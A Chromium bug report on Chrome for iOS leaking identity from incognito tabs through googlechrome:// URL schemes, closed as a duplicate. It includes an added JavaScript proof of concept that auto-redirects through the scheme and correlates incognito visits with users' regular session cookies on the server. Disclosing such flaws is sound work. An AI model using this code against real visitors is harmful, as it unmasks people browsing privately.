Identity Leakage in iOS Chrome Incognito Mode using URL Schemes
Reported by
ryanskid...@googlemail.com,
Oct 31 2017
Issue description

PRIVACY ISSUE

Google Chrome for iOS supports URL Schemes which launch other applications with data, including itself using the googlechrome:// URL Scheme. This allows a tab within Google Chrome to open another tab within the app, and by default this tab is a regular, non-incognito tab. If a webpage opens a googlechrome:// URL Scheme link in incognito mode, the app still opens this link in a regular, non-incognito tab despite the originating tab being incognito. This allows an incognito webpage to gain additional identity information about a user with zero user interaction by forcibly opening a non-incognito tab.

VERSION:
Chrome Version: 62.0.3202.70 stable
Operating System: Chrome iOS

REPRODUCTION STEPS
1. Create a web page with a googlechrome:// URL scheme in it (either by button click or automatic redirect)
2. Open this page in incognito mode
3. Trigger the URL scheme
4. The URL opens in a regular, non-incognito tab.

This has privacy implications because with the assistance of server-side code, the incognito tab could get access to all identity data a regular tab has access to.
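The reproduction steps and the "server-side code" correlation the reporter mentions, sketched as an added example (not the reporter's code and not from Chromium). The googlechrome:// and googlechromes:// mapping for http and https URLs follows Google's published guidance for opening links in Chrome for iOS; the probe host, the `probe` query parameter, the cookie name and the sample requests are constructed for illustration and are assumptions, not anything the report states.

```javascript
// Added example, not the reporter's code. The probe URL, the "probe" query
// parameter name, the "session" cookie name and the sample traffic below are
// all constructed assumptions; only the scheme mapping is Google's documented one.

// Map an http(s) URL to the Chrome-for-iOS URL scheme:
// http://  -> googlechrome://   https:// -> googlechromes://
function toChromeScheme(url) {
  const u = new URL(url);
  if (u.protocol === 'https:') return 'googlechromes://' + url.slice('https://'.length);
  if (u.protocol === 'http:') return 'googlechrome://' + url.slice('http://'.length);
  throw new Error('only http and https URLs can be opened via the Chrome scheme');
}

// Build the link the incognito page triggers: same site, tagged with a
// per-visit token so the server can join the incognito hit to the regular one.
function buildProbeLink(baseUrl, token) {
  const u = new URL(baseUrl);
  u.searchParams.set('probe', token);
  return toChromeScheme(u.toString());
}

// Step 3 of the report, the zero-interaction variant: an automatic redirect.
// In a browser this navigates; outside one (e.g. Node) it just returns the link.
function triggerProbe(baseUrl, token) {
  const link = buildProbeLink(baseUrl, token);
  if (typeof window !== 'undefined') window.location.href = link;
  return link;
}

// Server-side correlation (the "assistance of server-side code"): a request
// that arrives with no identity cookie is the incognito tab; a request with the
// same token and the user's regular cookie is the non-incognito tab Chrome opened.
// Returns { token: identity } for every token seen from both contexts.
function correlate(requests) {
  const byToken = new Map();
  for (const r of requests) {
    const token = new URL(r.url, 'https://placeholder').searchParams.get('probe');
    if (!token) continue;
    const entry = byToken.get(token) || { incognito: null, identity: null };
    if (r.cookies && r.cookies.session) entry.identity = r.cookies.session;
    else entry.incognito = r.url;
    byToken.set(token, entry);
  }
  const joined = {};
  for (const [token, e] of byToken) {
    if (e.incognito && e.identity) joined[token] = e.identity;
  }
  return joined;
}

// Constructed sample traffic: one visitor whose incognito page fired the
// scheme and was opened in a regular tab, one whose redirect never completed.
const sampleRequests = [
  { url: '/probe.html?probe=abc123', cookies: {} },                   // incognito: no cookies
  { url: '/landing?probe=abc123', cookies: { session: 'user-42' } },  // regular tab via scheme
  { url: '/probe.html?probe=zzz999', cookies: {} },                   // incognito only, no join
];

if (typeof module !== 'undefined') {
  module.exports = { toChromeScheme, buildProbeLink, triggerProbe, correlate, sampleRequests };
}
```

The point of the join is that the incognito request alone carries nothing identifying; it is the forced non-incognito tab, sending the user's ordinary cookies for the same token, that leaks identity back to the page that was supposed to be isolated.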
Comment 1 by jochen@chromium.org, Nov 2 2017
Status: Duplicate (was: Untriaged)